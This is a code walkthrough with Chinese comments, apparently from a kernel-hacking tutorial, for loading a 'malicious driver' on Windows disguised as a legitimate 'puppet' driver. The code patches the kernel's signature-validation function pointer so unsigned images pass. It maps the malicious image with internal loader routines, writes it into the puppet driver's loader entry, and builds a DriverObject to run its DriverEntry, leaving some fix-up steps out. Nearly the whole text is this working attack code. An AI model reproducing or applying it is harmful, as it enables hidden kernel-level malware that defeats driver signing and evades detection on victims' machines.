// 将 恶意驱动 伪装成 傀儡驱动
// 自建注册表服务,以 ServiceName 命名
略,详情请看代码;
// Patch 签名校验 可省略,看你需要加载的驱动是否有签名
CIFun
=
*
Pqword_14040EF40;
*
Pqword_14040EF40
=
MySeValidateImageHeader;
// 换成我们的函数,这个函数返回 STATUS_SUCCESS
// 获取 恶意驱动的 DriverSection 和 傀儡驱动的 DriverSection
status
=
MiObtainSectionForDriver(&AString, &ADrvPathUn,
0
,
0
, &PADriverSection);
status
=
MiObtainSectionForDriver(&OString, &ODrvPathUn,
0
,
0
, &PODriverSection);
// 对恶意驱动 进行映射
Section
=
*
(PULONG64)(PADriverSection
+
SectionOffset);
DllBase
=
MiGetSystemAddressForImage(Section,
0
, &un);
status
=
MiMapSystemImage(Section, DllBase);
Head
=
RtlImageNtHeader(DllBase);
DllSize
=
*
(PULONG32)(Head
+
0x50
);
// 恢复patch 可省略,看你需要加载的驱动是否有签名
*
Pqword_14040EF40
=
CIFun;
// 将恶意驱动信息填入 傀儡驱动DriverSection 并提交(加入PsLoadedModuleList链表)
PODriverSection
-
>SizeOfImage
=
DllSize;
PODriverSection
-
>DllBase
=
DllBase;
status
=
MiConstructLoaderEntry(PODriverSection, &OutU, &OString,
0
,
1
, &NewPODriverSection);
// 修复IAT
略;
// 修复_security_cookie
略;
// 修复 WDF(可选)
略,这一部分是因为 WDF的驱动 DriverEntry 内有一些特殊操作,不修复就会蓝屏,WDM驱动就没有这个问题;
// 构造 DriverObject ,并填入信息(恶意驱动的信息) ,然后 加入 全局 Object 表
status
=
ObCreateObjectEx(
0
,
*
PIoDriverObjectType, &att,
0
, &Out,
0x1A0
,
0
,
0
, &PTDrvObj,
0
);
memset(PTDrvObj,
0
,
0x1a0
);
PTDrvObj
-
>DriverExtension
=
&PTDrvObj[
1
];
*
(PULONG64)(&PTDrvObj[
1
])
=
&PTDrvObj[
0
];
for
(
int
i
=
0
; i <
=
IRP_MJ_MAXIMUM_FUNCTION; i
+
+
) {
PTDrvObj
-
>MajorFunction[i]
=
PIopInvalidDeviceRequest;
}
PTDrvObj
-
>
Type
=
4
; PTDrvObj
-
>Size
=
0x150
;
PTDrvObj
-
>DriverInit
=
NewPODriverSection
-
>EntryPoint;
PTDrvObj
-
>DriverSection
=
NewPODriverSection;
PTDrvObj
-
>DriverStart
=
DllBase;
PTDrvObj
-
>DriverSize
=
DllSize;
PTDrvObj
-
>Flags |
=
2
;
status
=
ObInsertObjectEx(PTDrvObj,
0
,
1
,
0
,
0
,
0
, &DrvH);
status
=
ObReferenceObjectByHandle(DrvH,
0
,
*
PIoDriverObjectType,
0
, &PTDrvObj, NULL);
ZwClose(DrvH);
PTDrvObj
-
>HardwareDatabase
=
PCmRegistryMachineHardwareDescriptionSystemName;
PTDrvObj
-
>DriverName.
Buffer
=
ExAllocatePool(NonPagedPool, ObjectName.MaximumLength);
PTDrvObj
-
>DriverName.Length
=
ObjectName.Length;
PTDrvObj
-
>DriverName.MaximumLength
=
ObjectName.MaximumLength;
memcpy(PTDrvObj
-
>DriverName.
Buffer
, ObjectName.
Buffer
, ObjectName.MaximumLength);
// ObjectName 是 "\\Driver\\XXX"
// 调用DriverEntry
status
=
ZwQueryObject(HRegistry,
1
, PSTR,
0x1000
, &NtQueryObjReturnLen);
PTDrvObj
-
>DriverInit(PTDrvObj,PSTR);
// 提交设备
IopReadyDeviceObjects(PTDrvObj);